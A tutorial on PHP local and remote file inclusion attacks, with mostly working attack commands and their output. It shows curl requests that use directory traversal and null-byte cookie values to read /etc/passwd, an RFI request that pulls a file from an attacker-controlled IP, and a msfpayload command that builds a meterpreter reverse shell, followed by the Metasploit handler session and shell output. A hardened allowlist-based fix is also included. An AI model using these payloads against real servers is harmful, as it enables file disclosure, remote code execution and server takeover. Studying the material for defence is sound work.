
PHP Local and Remote File Inclusion (LFI, RFI) Attacks


PHP supports the ability to 'include' or 'require' additional files within a script. If unsanitized data is passed to such functions, an attacker may be able to gain remote code execution on the server. A typical include block might look something like this:
<?php
require("config/settings.inc.php");
require("lib/db.lib.php");
require("lib/parser.lib.php");
include("contrib/users/user.contrib.php");
die("This is a test");
?>
Now, it's also possible to dynamically require or include files based on variables or user input, say for example:

<?php
require("config/" . $username . ".inc.php");
die("This is a test");
?>
or
<?php
require("config/" . $_COOKIE['pref_file'] . ".inc.php");
die("This is a test");
?>
The problem with the $_COOKIE['pref_file'] example is that, of course, the user controls his own cookies. In this case, rather than the expected value, which might be 'username_prefs_123456' for example, the user can set a more malicious value. Ultimately, the web server will then include this malicious file and execute it as a PHP script. This malicious file will have the permissions to do anything that any other server-side PHP script is able to do, which will most likely enable the attacker to obtain a shell. Let's look at the different ways that the vulnerability can be leveraged.
Let's call our script 'test.php' and create a sample valid include file, i.e. config/npn.inc.php, containing a simple echo statement. Now running curl and setting the 'pref_file' cookie to contain 'npn' results in the following:
root@pwn:/var/www# curl http://localhost/test.php -b "pref_file=npn"
This is a test include
This is a test
root@pwn:/var/www#
Exactly as we expect!
Now, let's say that we want to use a Local File Inclusion (LFI) attack to include /etc/passwd instead. We are faced with two immediate issues. Firstly, "config/" is prepended to the start of our pref_file cookie and secondly, ".inc.php" is appended to the end. Directory traversal and null bytes to the rescue!
If we pass a modified curl request, our attack is successful (the null byte is sent URL-encoded as %00; PHP decodes cookie values before they reach $_COOKIE, so the script sees a raw NUL):
root@pwn:/var/www# curl http://localhost/test.php -b "pref_file=../../../etc/passwd%00"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
...
Let's examine our attack string in a little more detail. What's now being included is "config/../../../etc/passwd\0.inc.php". By traversing the directory tree with '../' we can position ourselves three directories back, at the root '/' of the filesystem, before specifying the file that we're interested in: /etc/passwd. By including a single null byte (\0, sent as %00), we terminate the string, and so anything after it, i.e. '.inc.php', is discarded by PHP. Note that this null byte issue inside paths was resolved in PHP 5.3.4; from that version on, a path containing a null byte is rejected rather than silently truncated, so the ".inc.php" suffix can no longer be stripped this way.
The second LFI attack method involves being able to upload files to the filesystem. As an attacker, if we can find another means to get files onto the file system, such as through anonymous FTP, image uploads, profile uploads, or even PHP session files containing arbitrary code, then we can instruct the application to include these files in just the same way as above.
Now we come on to the more interesting Remote File Inclusion (RFI) attack. If PHP has URL wrappers enabled (allow_url_fopen for functions such as fopen, and, since PHP 5.2, the separate allow_url_include setting for include and require), then it's possible to pass HTTP links into those functions.
Take the sample code:
<?php
require($_COOKIE['pref_file'] . ".inc.php");
die("This is a test");
?>
If we call the script with: curl http://localhost/test.php -b "pref_file=http://192.168.230.128/malicious"
root@pwn:/var/www# curl http://localhost/test.php -b "pref_file=http://192.168.230.128/malicious"
You just included a malicious file!
This is a test
If the PHP version is not susceptible to the null byte attack, then, as seen above, since we control our own web server, we can create 'malicious.inc.php', which already carries the '.inc.php' the application will append, and simply pass the string ending in '/malicious' to the application.
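As an added example, not code from the original post, here is a hardened replacement for the cookie-driven require() that closes both the LFI case (traversal plus null byte) and the RFI case (URL wrapper) discussed above. It assumes, like the article, a config/ directory holding npn.inc.php; the PREF_FILES table, the resolve_pref_file() helper and the throwaway demo directory are my own names, not anything from the article.

```php
<?php
// Added example, not code from the original post: a hardened replacement for
// require("config/" . $_COOKIE['pref_file'] . ".inc.php").
// Assumptions: legitimate preference files live under one directory and are a
// small fixed set; PREF_FILES, resolve_pref_file() and the demo directory are
// hypothetical names chosen for this example.
declare(strict_types=1);

// Allowlist: untrusted token => file name we picked ourselves. Nothing outside
// this table is ever passed to require(), so traversal, null bytes and stream
// wrappers (http://, php://, data://, ...) never reach the filesystem layer.
const PREF_FILES = [
    'npn'     => 'npn.inc.php',
    'default' => 'default.inc.php',
];

/**
 * Map an untrusted preference name to an absolute path under $baseDir.
 * Returns null when the value must be rejected.
 */
function resolve_pref_file(string $untrusted, string $baseDir): ?string
{
    // Defence in depth: accept only a short plain identifier. This rejects
    // '../', a raw NUL (what %00 becomes after PHP decodes the cookie) and
    // anything containing '://' before the allowlist is even consulted.
    if (preg_match('/\A[a-z0-9_]{1,32}\z/', $untrusted) !== 1) {
        return null;
    }
    if (!array_key_exists($untrusted, PREF_FILES)) {
        return null;
    }
    // realpath() canonicalises and returns false if the file does not exist.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PREF_FILES[$untrusted]);
    if ($base === false || $path === false) {
        return null;
    }
    // Containment check: the canonical file must sit beneath the base dir.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// ---- Demonstration with constructed inputs -------------------------------
// Build a throwaway config dir with the same npn.inc.php the article uses.
$baseDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'lfi-demo-config';
if (!is_dir($baseDir)) {
    mkdir($baseDir, 0700);
}
file_put_contents($baseDir . '/npn.inc.php', "<?php echo \"This is a test include\\n\";\n");

// Cookie values an attacker would send, as seen after PHP's URL-decoding.
$samples = [
    'npn',                               // the legitimate case
    "../../../etc/passwd\0",             // LFI: traversal + null byte (PHP < 5.3.4)
    '../../../etc/passwd',               // LFI: traversal only
    'http://192.168.230.128/malicious',  // RFI via the http:// wrapper
    'npn/../../../etc/passwd',           // traversal hidden behind a valid token
];

foreach ($samples as $value) {
    $resolved = resolve_pref_file($value, $baseDir);
    printf("%-40s => %s\n", json_encode($value, JSON_UNESCAPED_SLASHES),
           $resolved === null ? 'REJECTED' : 'ok');
    if ($resolved !== null) {
        require $resolved;               // only ever a path we chose ourselves
    }
}
```

Run it from the command line with the php binary; only the 'npn' entry resolves and pulls in the echo statement, every other sample is rejected before anything touches the filesystem. Two further checks a practitioner will want alongside this: confirm allow_url_include is Off in php.ini (it is Off by default since PHP 5.2, and is the setting that decides whether the RFI above works at all), and note that because this vector travels in a cookie, the payload will not appear in a default Apache combined access log unless the Cookie header is logged explicitly.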
This article wouldn't be finished without shell access! We can generate our shell with:
msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=8080 R > /var/www/malicious.inc.php
Set Metasploit to listen for connections:
msf > use exploit/multi/handler
msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > set LPORT 8080
LPORT => 8080
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > exploit

[*] Started reverse handler on 0.0.0.0:8080
[*] Starting the payload handler...
Now trigger the remote application to include our malicious file. Our curl request hangs as the script kicks into action:
[*] Sending stage (39195 bytes) to 192.168.230.128
[*] Meterpreter session 1 opened (192.168.230.128:8080 -> 192.168.230.128:39890) at 2013-08-10 16:49:44 +0100

meterpreter > shell
Process 5960 created.
Channel 0 created.
whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
ps
  PID TTY          TIME CMD
 5611 ?        00:00:00 apache2
 5612 ?        00:00:00 apache2
 5613 ?        00:00:00 apache2
 5614 ?        00:00:00 apache2
 5615 ?        00:00:00 apache2
 5911 ?        00:00:00 apache2
 5912 ?        00:00:00 apache2
 5913 ?        00:00:00 apache2
 5960 ?        00:00:00 sh
 5970 ?        00:00:00 ps